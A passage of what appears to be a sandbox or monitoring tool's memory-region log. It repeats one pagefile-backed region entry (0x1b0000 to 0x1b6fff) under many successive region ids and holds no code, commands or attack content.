name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8098 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8099 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8100 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8101 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8102 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8103 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8104 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8105 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8106 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8166 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8167 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8168 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8169 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8170 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8171 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8172 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8173 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8174 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8175 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8176 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8177 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8178 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8179 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8180 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8181 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8182 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8183 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8184 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8185 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8186 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8187 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8188 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8189 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8190 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8191 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8192 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8193 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8194 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8195 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8196 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8197 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8198 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8199 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8200 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8201 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8202 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8203 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8204 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8205 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8206 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8207 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8208 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8209 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8210 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8211 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8212 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8213 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8265 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8266 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8267 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8268 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8269 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8270 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8271 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8272 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8273 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8274 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8275 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8276 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8277 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8278 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8285 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8286 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8287 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8288 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8289 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8290 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8291 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8292 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8293 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8294 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8295 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8296 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8297 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8298 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8299 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8300 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8301 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8302 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8303 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8304 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8305 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8306 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8307 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8308 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8309 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8310 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8311 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8312 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8313 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8361 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8362 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8363 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8364 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8365 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8366 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8367 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8368 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8369 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8370 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8371 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8372 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8373 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8374 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8375 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8376 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8377 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8378 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8379 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8380 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8381 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8382 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8383 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8384 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8385 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8386 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8387 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8388 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8389 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8390 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8391 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8392 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8393 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8394 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8395 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8396 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8397 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8398 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8399 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8400 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8401 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8402 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8403 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8404 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8405 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8416 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8417 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8418 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8419 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8420 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8421 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8422 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8423 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8424 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8425 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8426 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8427 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8428 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8429 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8430 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8431 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8432 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8433 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8434 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8435 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8443 start_va = 0x1b0000 end_va 